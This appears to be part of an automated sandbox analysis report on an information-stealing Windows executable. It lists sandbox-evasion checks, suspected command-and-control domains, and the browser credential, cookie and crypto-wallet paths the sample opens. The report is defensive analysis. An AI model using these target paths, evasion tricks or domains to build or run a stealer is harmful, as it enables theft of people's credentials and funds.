              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: BDxsBr8Dce.exeStatic PE information: More than 957 > 100 exports found
              Source: BDxsBr8Dce.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
              Source: BDxsBr8Dce.exeStatic file information: File size 15643816 > 1048576
              Source: BDxsBr8Dce.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x9f3800
              Source: BDxsBr8Dce.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x43d000
              Source: BDxsBr8Dce.exeStatic PE information: More than 200 imports for KERNEL32.dll
              Source: BDxsBr8Dce.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: BDxsBr8Dce.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: BDxsBr8Dce.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: BDxsBr8Dce.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: BDxsBr8Dce.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: BDxsBr8Dce.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_0108A630 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,OpenProcessToken,GetTokenInformation,_malloc,GetTokenInformation,GetLengthSid,_malloc,CopySid,_free,CloseHandle,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,0_2_0108A630
              Source: BDxsBr8Dce.exeStatic PE information: section name: .qtmetad
              Source: BDxsBr8Dce.exeStatic PE information: section name: _RDATA
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_007780DA push dword ptr [esi+ebx-75h]; retf 0_2_007780E5
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_0077816F push dword ptr [esi+ebx-75h]; retf 0_2_00778196
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_0077813E push dword ptr [esi+ebx-75h]; retf 0_2_00778149
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_007781F3 push dword ptr [edi+esi-75h]; ret 0_2_007781F8
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_007781B8 push dword ptr [esi+ebx-75h]; retf 0_2_007781C3
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00778242 push dword ptr [edx+ebx-75h]; retf 0_2_00778257
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_007783F9 push dword ptr [esi+ebx-75h]; retf 0_2_00778406
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_007783AE push dword ptr [esi+ebx-75h]; retf 0_2_007783B9
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00778463 push dword ptr [edi+esi-75h]; ret 0_2_00778468
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00778428 push dword ptr [esi+ebx-75h]; retf 0_2_00778433
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_007784A2 push dword ptr [edx+ebx-75h]; ret 0_2_007784B2
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_0077851E push dword ptr [esi+ebx-75h]; retf 0_2_00778533
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00778583 push dword ptr [esi+ebx-75h]; ret 0_2_00778595
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00778648 push dword ptr [esi+ebx-75h]; retf 0_2_00778653
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00778611 push dword ptr [esi+ebx-75h]; retf 0_2_0077861E
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_0077877E push dword ptr [edx-75h]; retf 0_2_00778789
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00778741 push dword ptr [edx-75h]; retf 0_2_0077874C
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_007787FF push dword ptr [edx+ebx-75h]; retf 0_2_0077880A
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_007787BB push dword ptr [esi+ebx-75h]; retf 0_2_007787C6
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_01114935 push ecx; ret 0_2_01114948
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00774947 push dword ptr [ebp+ebx-75h]; ret 0_2_00774952
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_0077893A push dword ptr [edx-75h]; retf 0_2_00778945
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_007749EE push dword ptr [ebp+ebx-75h]; ret 0_2_007749F9
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_007789E8 push dword ptr [esi+ebx-75h]; retf 0_2_007789FD
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_0077499B push dword ptr [edx+ebx-75h]; ret 0_2_007749A8
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00778982 push dword ptr [esi+ebx-75h]; retf 0_2_0077898D
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00774A42 push dword ptr [edx+ebx-75h]; ret 0_2_00774A4F
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00778A4E push dword ptr [edx-75h]; ret 0_2_00778A59
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00774AE9 push dword ptr [edx+ebx-75h]; ret 0_2_00774AF6
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00774A95 push dword ptr [ebp+ebx-75h]; ret 0_2_00774AA0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00778B7B push dword ptr [esi+ebx-75h]; retf 0_2_00778B88
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_011092FE EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_011092FE
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeAPI coverage: 1.4 %
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exe TID: 7848Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_010925E0 FindFirstFileExW,FindNextFileW,0_2_010925E0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_01088B40 FindFirstFileW,FindClose,0_2_01088B40
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00FE5280 GetSystemInfo,0_2_00FE5280
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
              Source: BDxsBr8Dce.exe, 00000000.00000003.2386593047.0000000001D10000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3236905171.0000000001CD3000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.2386432214.0000000001D0C000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3237075620.0000000001D11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
              Source: BDxsBr8Dce.exe, 00000000.00000003.2386593047.0000000001D10000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.2386432214.0000000001D0C000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3237075620.0000000001D11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnC
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621812973.0000000004804000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
              Source: BDxsBr8Dce.exe, 00000000.00000003.1621946003.0000000004795000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
              Source: BDxsBr8Dce.exeBinary or memory string: .?AVQEmulationPaintEngine@@
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_011161B1 _memset,IsDebuggerPresent,0_2_011161B1
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_01122EB7 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_01122EB7
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_0108A630 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,OpenProcessToken,GetTokenInformation,_malloc,GetTokenInformation,GetLengthSid,_malloc,CopySid,_free,CloseHandle,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,0_2_0108A630
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_01114949 GetProcessHeap,0_2_01114949
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_011126C4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_011126C4

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: BDxsBr8Dce.exe, 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: debonairnukk.xyz
              Source: BDxsBr8Dce.exe, 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: diffuculttan.xyz
              Source: BDxsBr8Dce.exe, 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: effecterectz.xyz
              Source: BDxsBr8Dce.exe, 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: deafeninggeh.biz
              Source: BDxsBr8Dce.exe, 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: immureprech.biz
              Source: BDxsBr8Dce.exe, 00000000.00000002.3237395177.00000000038C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: poweryressz.click
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_008058C0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_008058C0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00F935B0 GetLocalTime,0_2_00F935B0
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_0110D8FC __lock,____lc_codepage_func,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0110D8FC
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeCode function: 0_2_00F71740 _memset,GetVersionExW,0_2_00F71740
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: BDxsBr8Dce.exe, 00000000.00000003.2386217778.0000000001D81000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1752392605.0000000001D81000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1692106471.0000000001D85000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1709116003.0000000001D81000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3237169586.0000000001D81000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000002.3236997897.0000000001CEE000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1691967736.0000000001D82000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.1692134573.0000000001D82000.00000004.00000020.00020000.00000000.sdmp, BDxsBr8Dce.exe, 00000000.00000003.2386465145.0000000001CEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: BDxsBr8Dce.exe PID: 7560, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: BDxsBr8Dce.exe, 00000000.00000003.1646187985.0000000001D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
              Source: BDxsBr8Dce.exe, 00000000.00000003.1646187985.0000000001D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: BDxsBr8Dce.exe, 00000000.00000003.1645986650.00000000047F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty9v
              Source: BDxsBr8Dce.exe, 00000000.00000003.1646187985.0000000001D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: BDxsBr8Dce.exe, 00000000.00000003.1646187985.0000000001D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
              Source: BDxsBr8Dce.exe, 00000000.00000003.1670484400.0000000001D6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: BDxsBr8Dce.exe, 00000000.00000003.1646187985.0000000001D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\BDxsBr8Dce.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
